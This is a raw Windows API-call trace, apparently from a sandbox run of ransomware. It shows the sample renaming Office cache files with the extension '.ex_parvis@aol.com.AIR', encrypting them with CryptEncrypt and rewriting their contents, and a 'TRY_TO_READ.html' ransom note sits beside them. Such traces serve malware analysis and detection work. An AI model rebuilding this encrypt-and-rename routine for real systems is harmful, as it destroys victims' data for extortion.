	[0100.887] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 82
	[0100.887] GetProcessHeap () returned 0x540000
	[0100.887] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0100.887] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml"
	[0100.887] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.887] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.893] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8
	[0100.893] GetProcessHeap () returned 0x540000
	[0100.893] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0100.893] GetFileSizeEx (in: hFile=0x4f8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1347) returned 1
	[0100.893] SetFilePointer (in: hFile=0x4f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x543
	[0100.893] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.893] GetProcessHeap () returned 0x540000
	[0100.893] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.893] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.894] WriteFile (in: hFile=0x4f8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.896] WriteFile (in: hFile=0x4f8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.896] WriteFile (in: hFile=0x4f8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.896] ReadFile (in: hFile=0x4f8, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x543, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x543, lpOverlapped=0x0) returned 1
	[0100.896] SetFilePointer (in: hFile=0x4f8, lDistanceToMove=-1347, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.896] WriteFile (in: hFile=0x4f8, lpBuffer=0x607bb8*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607bb8*, lpNumberOfBytesWritten=0x3a1f778*=0x543, lpOverlapped=0x0) returned 1
	[0100.896] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.896] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.897] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", dwFileAttributes=0x80) returned 1
	[0100.897] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 82
	[0100.897] GetProcessHeap () returned 0x540000
	[0100.897] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0100.897] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi"
	[0100.897] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.897] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.900] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8
	[0100.900] GetProcessHeap () returned 0x540000
	[0100.900] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0100.900] GetFileSizeEx (in: hFile=0x4f8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=875520) returned 1
	[0100.900] SetFilePointer (in: hFile=0x4f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd5c00
	[0100.900] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.900] GetProcessHeap () returned 0x540000
	[0100.900] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.900] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.901] WriteFile (in: hFile=0x4f8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.903] WriteFile (in: hFile=0x4f8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.903] WriteFile (in: hFile=0x4f8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.903] ReadFile (in: hFile=0x4f8, lpBuffer=0x3c20020, nNumberOfBytesToRead=0xd5c00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0xd5c00, lpOverlapped=0x0) returned 1
	[0100.929] SetFilePointer (in: hFile=0x4f8, lDistanceToMove=-875520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.929] WriteFile (in: hFile=0x4f8, lpBuffer=0x3d00020*, nNumberOfBytesToWrite=0xd5c00, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d00020*, lpNumberOfBytesWritten=0x3a1f778*=0xd5c00, lpOverlapped=0x0) returned 1
	[0100.943] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.943] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.943] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", dwFileAttributes=0x80) returned 1
	[0100.944] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 82
	[0100.944] GetProcessHeap () returned 0x540000
	[0100.944] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0100.944] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab"
	[0100.944] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.944] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.946] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8
	[0100.946] GetProcessHeap () returned 0x540000
	[0100.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0100.946] GetFileSizeEx (in: hFile=0x4f8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=11482605) returned 1
	[0100.946] SetFilePointer (in: hFile=0x4f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xaf35ed
	[0100.947] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.947] GetProcessHeap () returned 0x540000
	[0100.947] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.947] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.947] WriteFile (in: hFile=0x4f8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.951] WriteFile (in: hFile=0x4f8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.951] WriteFile (in: hFile=0x4f8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.951] ReadFile (in: hFile=0x4f8, lpBuffer=0x3c20020, nNumberOfBytesToRead=0xaf35ed, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0xaf35ed, lpOverlapped=0x0) returned 1
	[0101.584] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd7951d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7951d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dab70
	[0101.584] FindNextFileW (in: hFindFile=0x5dab70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd7951d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7951d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0101.584] FindNextFileW (in: hFindFile=0x5dab70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1
	[0101.585] FindNextFileW (in: hFindFile=0x5dab70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1
	[0101.585] FindNextFileW (in: hFindFile=0x5dab70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1
	[0101.585] FindNextFileW (in: hFindFile=0x5dab70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7951d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xd7951d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7977e70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0101.585] FindNextFileW (in: hFindFile=0x5dab70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7951d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xd7951d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7977e70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0101.585] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0101.585] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0101.585] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", dwFileAttributes=0x80) returned 1
	[0101.585] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 82
	[0101.585] GetProcessHeap () returned 0x540000
	[0101.585] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0101.585] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml"
	[0101.585] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0101.585] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0101.590] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc
	[0101.591] GetProcessHeap () returned 0x540000
	[0101.591] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0101.591] GetFileSizeEx (in: hFile=0x4fc, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1457) returned 1
	[0101.591] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5b1
	[0101.591] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0101.591] GetProcessHeap () returned 0x540000
	[0101.591] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0101.591] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0101.591] WriteFile (in: hFile=0x4fc, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0101.593] WriteFile (in: hFile=0x4fc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0101.593] WriteFile (in: hFile=0x4fc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0101.593] ReadFile (in: hFile=0x4fc, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x5b1, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x5b1, lpOverlapped=0x0) returned 1
	[0101.593] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=-1457, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0101.593] WriteFile (in: hFile=0x4fc, lpBuffer=0x607bb8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607bb8*, lpNumberOfBytesWritten=0x3a1f778*=0x5b1, lpOverlapped=0x0) returned 1
	[0101.593] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0101.593] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0101.593] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", dwFileAttributes=0x80) returned 1
	[0101.594] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 82
	[0101.594] GetProcessHeap () returned 0x540000
	[0101.594] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0101.594] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi"
	[0101.594] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR"
